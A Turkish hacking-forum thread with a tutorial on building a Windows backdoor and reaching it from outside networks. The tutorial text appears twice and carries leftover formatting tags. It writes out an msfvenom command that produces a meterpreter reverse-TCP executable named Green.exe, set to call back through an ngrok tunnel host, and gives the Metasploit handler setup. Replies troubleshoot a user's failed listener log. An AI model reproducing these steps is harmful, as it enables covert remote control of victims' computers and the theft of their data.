//M E T A S P L O I T\\ ile Dış Ağlara Backdoor Açalım !

Kalinux

Yeni üye
11 Mar 2021
16
4
Eline sağlık çaylak. Nedir leri biraz daha uzun tutarsan dahada güzel olur :D

Hepinize merhaba arkadaşlar bu konumda sizlere MSFVenom ve Met@sploit ile dış ağlara backdoor açılımını göstereceğim.

Bu konuda şunları öğreneceksiniz:



M E T A S P L O I T nedir?

Ngrok nedir?

Ngrok nasıl çalışır?

M S F V E N O M nedir?

Exploit nedir?

Payload nedir?

Port nedir?

Resimli anlatım.







Met@sploit nedir?



Met@sploit, sistemdeki zâfiyetler hakkında bilgi veren, pentest ve IDS'nin gelişimine yardımcı olan bir konsol uygulamasıdır.







Ngrok nedir?



Ngrok, local ağı port yardımıyla internete açan bir uygulamadır.







Ngrok, nasıl çalışır?



Ngrok, belirttiğiniz protokol ve port ile local ağı internete açık hale getirir.







MSFVenom, nedir?



MSFVenom, MSF'e bağlı olan bir payload oluşturmak için kullanılan terminal uygulamasıdır.







Exploit nedir?



Hedef sistemdeki zâfiyetlerden yararlanmak için yazılan scripttir.

Yazıldığı dillere örnek vermek gerekirse: C, C++, Ruby gibi diller kullanılarak yazılır.







Payload nedir?



Payload, exploit işlemi başarılı olduğu süreçte hedefe gönderilip çalıştırma emri verilen modüldür.







Port, nedir?



Port, bir bağlantının iletişim uç noktasıdır.







Resimli anlatım.



Ngrok hesabı oluşturalım:



Ngrok'un kendi sitesi olan "ngrok.com" sitesine girelim ve sign up tuşuna basalım.







Sonrasında istenilen bilgileri doldurarak kayıt olalım.







Bize lazım olan kısım "2." kısımdır. Bunu bir köşeye yazalım.







Ngrok'u indirelim.







Ngrok indikten sonra terminale "2." kısımdaki kodu yazalım.



Sonrasında ./ngrok tcp 22 komutuyla tcp protokolü kullanarak 22. portu dinlemeye alalım ve yönlendirme işlemini local hostumuza yapsın.







MSFVenom ile backdoor oluşturalım.



Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=18504 -f exe R > Green.exe



Backdoorumuz oluştuktan sonra onu dinlemeye almak için terminale "msfconsole" yazalım.



MSFConsole açıldıktan sonra terminale şunları yazalım:



Kod:
use exploit/multi/handler[/COLOR][/B][/FONT][/CENTER][/COLOR][/B][/FONT][/CENTER][/COLOR][/B][/FONT][/CENTER][/COLOR][/B][/FONT][/CENTER]
[FONT=Courier New][B][COLOR=Cyan][CENTER][FONT=Courier New][B][COLOR=Cyan][CENTER][FONT=Courier New][B][COLOR=Cyan][CENTER][FONT=Courier New][B][COLOR=Cyan]
[CENTER]

set payload windows/meterpreter/reverse_tcp



set LHOST 127.0.0.1



set LPORT 22











Terminale "run" yazdığımızda backdoor'u dinlemeye alacağız.



Konuda ki terimler:



Backdoor: Arka kapı

Local: Yerel

Host: Ağ

Local Host: Yerel Ağ

Hepinize merhaba arkadaşlar bu konumda sizlere MSFVenom ve Met@sploit ile dış ağlara backdoor açılımını göstereceğim.

Bu konuda şunları öğreneceksiniz:



M E T A S P L O I T nedir?

Ngrok nedir?

Ngrok nasıl çalışır?

M S F V E N O M nedir?

Exploit nedir?

Payload nedir?

Port nedir?

Resimli anlatım.







Met@sploit nedir?



Met@sploit, sistemdeki zâfiyetler hakkında bilgi veren, pentest ve IDS'nin gelişimine yardımcı olan bir konsol uygulamasıdır.







Ngrok nedir?



Ngrok, local ağı port yardımıyla internete açan bir uygulamadır.







Ngrok, nasıl çalışır?



Ngrok, belirttiğiniz protokol ve port ile local ağı internete açık hale getirir.







MSFVenom, nedir?



MSFVenom, MSF'e bağlı olan bir payload oluşturmak için kullanılan terminal uygulamasıdır.







Exploit nedir?



Hedef sistemdeki zâfiyetlerden yararlanmak için yazılan scripttir.

Yazıldığı dillere örnek vermek gerekirse: C, C++, Ruby gibi diller kullanılarak yazılır.







Payload nedir?



Payload, exploit işlemi başarılı olduğu süreçte hedefe gönderilip çalıştırma emri verilen modüldür.







Port, nedir?



Port, bir bağlantının iletişim uç noktasıdır.







Resimli anlatım.



Ngrok hesabı oluşturalım:



Ngrok'un kendi sitesi olan "ngrok.com" sitesine girelim ve sign up tuşuna basalım.







Sonrasında istenilen bilgileri doldurarak kayıt olalım.







Bize lazım olan kısım "2." kısımdır. Bunu bir köşeye yazalım.







Ngrok'u indirelim.







Ngrok indikten sonra terminale "2." kısımdaki kodu yazalım.



Sonrasında ./ngrok tcp 22 komutuyla tcp protokolü kullanarak 22. portu dinlemeye alalım ve yönlendirme işlemini local hostumuza yapsın.







MSFVenom ile backdoor oluşturalım.



Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=18504 -f exe R > Green.exe



Backdoorumuz oluştuktan sonra onu dinlemeye almak için terminale "msfconsole" yazalım.



MSFConsole açıldıktan sonra terminale şunları yazalım:



Kod:
use exploit/multi/handler[/COLOR][/B][/FONT][/CENTER][/COLOR][/B][/FONT][/CENTER][/COLOR][/B][/FONT][/CENTER]
[FONT=Courier New][B][COLOR=Cyan][CENTER][FONT=Courier New][B][COLOR=Cyan][CENTER][FONT=Courier New][B][COLOR=Cyan]
[CENTER]

set payload windows/meterpreter/reverse_tcp



set LHOST 127.0.0.1



set LPORT 22










Terminale "run" yazdığımızda backdoor'u dinlemeye alacağız.



Konuda ki terimler:



Backdoor: Arka kapı

Local: Yerel

Host: Ağ

Local Host: Yerel Ağ
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(multi/handler) > set LPORT 22
LPORT => 22
msf6 exploit(multi/handler) > run
[-] Unknown command: r�un
msf6 exploit(multi/handler) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[-] Handler failed to bind to 127.0.0.1:22:- -
[-] Handler failed to bind to 0.0.0.0:22:- -
[-] Exploit failed: Errno::EACCES Permission denied - bind(2) for 0.0.0.0:22
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[-] Handler failed to bind to 127.0.0.1:22:- -
[-] Handler failed to bind to 0.0.0.0:22:- -
[-] Exploit failed: Errno::EACCES Permission denied - bind(2) for 0.0.0.0:22
[*] Exploit completed, but no session was created.

Yardm edermisin?
 
Moderatör tarafında düzenlendi:

DeathViper

Katılımcı Üye
3 Şub 2022
455
190
🇹🇷ANITKABİR🇹🇷
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(multi/handler) > set LPORT 22
LPORT => 22
msf6 exploit(multi/handler) > run
[-] Unknown command: r�un
msf6 exploit(multi/handler) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[-] Handler failed to bind to 127.0.0.1:22:- -
[-] Handler failed to bind to 0.0.0.0:22:- -
[-] Exploit failed: Errno::EACCES Permission denied - bind(2) for 0.0.0.0:22
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[-] Handler failed to bind to 127.0.0.1:22:- -
[-] Handler failed to bind to 0.0.0.0:22:- -
[-] Exploit failed: Errno::EACCES Permission denied - bind(2) for 0.0.0.0:22
[*] Exploit completed, but no session was created.
Dostum
Önce sil
Sonra şu komutu yap
sudo apt-get remove --auto-remove metasploit-framework
Sonra github dan birdaha kur
 

Nikon of Disast

Uzman üye
16 May 2020
1,640
1,172
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(multi/handler) > set LPORT 22
LPORT => 22
msf6 exploit(multi/handler) > run
[-] Unknown command: r�un
msf6 exploit(multi/handler) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[-] Handler failed to bind to 127.0.0.1:22:- -
[-] Handler failed to bind to 0.0.0.0:22:- -
[-] Exploit failed: Errno::EACCES Permission denied - bind(2) for 0.0.0.0:22
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[-] Handler failed to bind to 127.0.0.1:22:- -
[-] Handler failed to bind to 0.0.0.0:22:- -
[-] Exploit failed: Errno::EACCES Permission denied - bind(2) for 0.0.0.0:22
[*] Exploit completed, but no session was created.
set LHOST 0.0.0.0 - set LPORT *portunuz, örn 1234* ek olarak payloadınızı seçmeyi unutmayın, -p'den sonra gelen payloadı seçin.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.